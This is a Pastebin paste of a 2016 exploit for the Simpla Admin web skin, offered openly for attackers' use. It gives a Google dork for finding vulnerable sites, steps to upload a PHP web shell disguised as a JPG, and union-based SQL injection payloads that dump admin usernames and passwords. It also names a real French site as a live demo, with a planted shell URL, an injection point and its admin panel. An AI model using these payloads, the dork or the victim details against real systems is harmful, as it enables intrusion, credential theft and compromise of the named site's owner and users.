API tools faq
paste
Advertisement
xBADGIRL21

Simpla Admin Single-adsID SQL Injection / Shell Upload

xBADGIRL21
Jul 9th, 2016
173
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Exploit Title : Simpla Admin Single-adsID SQL Injection / Shell Upload
  3. # Exploit Author : xBADGIRL21
  4. # Dork : intext:connexion "single-ads.php?ID=" or inurl:.single-ads.php?ID=
  5. # Software link : https://themeforest.net/item/simpla-admin-flexible-user-friendly-admin-skin/46073
  6. # Category: [ Webapps ]
  7. # Tested on: [ Windows ]
  8. # Vendore : https://themeforest.net
  9. # Version : 1.02
  10. # skype:xbadgirl21
  11. # Date: 2016-07-07
  12. # video Proof : https://youtu.be/Ouy8h6G9Pyo
  13. ######################
  14. #
  15. ######################
  16. # Shell Upload #
  17. ######################
  18. # Description :
  19. # this upload shell exploit allow attackers to upload there shells eazy by registering in the website
  20. # then choose to Edit your info then uploading there shell as shell.jpg then to shell.php using Live HTTP Headers
  21. # path Ev!l : /common/uploaded_files/user
  22. # PoC:
  23. # 1 - choose a site and open it
  24. # 2- Register in the website
  25. # 3- upload your shell as image JPG then to PHP using Live HTTP Headers
  26. # 4- Go to : /common/uploaded_files/user/[RANDOME_NUMshell.php]
  27. #######################
  28. #
  29. # Live Demo:http://www.labouteillealamer.fr/common/uploaded_files/user/1467918685a.php
  30. #
  31. ######################
  32. # SQL injection #
  33. ######################
  34. # PoC:
  35. # http://www.site.com/single-ads.php?ID=[SQLi]
  36. ######################
  37. + test:=> http://www.site.com/single-ads.php?ID=[5830] INJECT HERE
  38. ######################
  39. + CODES :
  40. # http://www.site.com/single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 --
  41. # http://www.site.com/single-ads.php?ID=single-ads.php?ID=-5830 /*!11111union*/ select 1,2,3,/*!11111group_coNcat(AdminUserName,0x3a,AdminPassword)*/,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from lbm_admin--
  42. + Demo:
  43. + http://www.labouteillealamer.fr/single-ads.php?ID=5830'
  44. + Admin Panel :
  45. + http://www.labouteillealamer.fr/lbmbackoffice/
  46. ######################
  47. # Discovered by : xBADGIRL21
  48. # Greetz : All Mauritanien Hackers - NoWhere
  49. #######################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!